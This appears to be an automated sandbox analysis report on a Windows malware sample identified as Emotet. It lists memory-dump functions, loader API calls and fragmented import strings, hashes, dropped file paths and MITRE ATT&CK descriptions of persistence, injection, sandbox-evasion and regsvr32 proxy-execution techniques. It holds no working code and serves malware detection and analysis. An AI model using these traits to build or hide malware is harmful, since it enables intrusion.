GetVolumeInformationW.KERNELBASE ref: 00000001800019FF

Memory Dump Source

Source File: 00000006.00000002.769531041.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: c26c48defa982342e2f20ae4a22bab2a9dda78d1f7e6cee8cfcae6a4f9b5f28e
Instruction ID: 43b5742128dda7179e1ece1c22ac01b13fc8f1aebeeb4861cd8a3c6048fefe45
Opcode Fuzzy Hash: c26c48defa982342e2f20ae4a22bab2a9dda78d1f7e6cee8cfcae6a4f9b5f28e
Instruction Fuzzy Hash: 9A412A7051C7858FE7B4DF28D485B9AB7E0FB88315F10896DE88CC7296DB748888CB46

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 1788, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	41
Total number of Limit Nodes:	3

Executed Functions

Function 00CA0000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 00CA0344
VirtualAlloc.KERNELBASE ref: 00CA038A
VirtualProtect.KERNELBASE ref: 00CA085C
RtlAddFunctionTable.KERNEL32 ref: 00CA08E9

Strings

hIns, xrefs: 00CA00EB
o, xrefs: 00CA012E
nf, xrefs: 00CA0127
lloc, xrefs: 00CA00BD
Libr, xrefs: 00CA009D
aryA, xrefs: 00CA00A5
Slee, xrefs: 00CA0084
Virt, xrefs: 00CA00AD
Virt, xrefs: 00CA00C5
temI, xrefs: 00CA011F
ncti, xrefs: 00CA0141
Cach, xrefs: 00CA0100
ualA, xrefs: 00CA00B5
GetN, xrefs: 00CA0107
truc, xrefs: 00CA00F2
onTa, xrefs: 00CA0148
ddFu, xrefs: 00CA013A
tion, xrefs: 00CA00F9
rote, xrefs: 00CA00D5
ct, xrefs: 00CA00DD
ativ, xrefs: 00CA010F
eSys, xrefs: 00CA0117
Flus, xrefs: 00CA00E4
RtlA, xrefs: 00CA0133
Load, xrefs: 00CA0095
ualP, xrefs: 00CA00CD

Memory Dump Source

Source File: 00000011.00000002.409536273.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ca0000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 998211078-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: ae71acd520a1e84bd959ae16a52d87bc8196b8db5db9051df9af0e55539e933e
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: ED523830A18B098BDB19DF18D8857BAB7F0FB55308F24462DE89BC7251DB34E546CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800284B0 Relevance: 1.6, APIs: 1, Instructions: 121
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 000000018002867E

Memory Dump Source

Source File: 00000011.00000002.410373620.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report U9M1w8FHBW.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Windows Analysis Report
U9M1w8FHBW.exe

Function 00007FFD14673FB0 Relevance: 2283.0, APIs: 11, Strings: 1292, Instructions: 2747
COMMONCrypto

Function 000002A683650000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Function 0000000180004DDC Relevance: 7.8, Strings: 6, Instructions: 338
COMMON

Function 0000000180028C94 Relevance: 6.5, Strings: 5, Instructions: 249
COMMON

Function 0000000180005DB4 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Function 00000001800248E0 Relevance: 5.9, Strings: 4, Instructions: 869
COMMON

Function 00007FFD14664194 Relevance: 18.1, APIs: 12, Instructions: 133
COMMON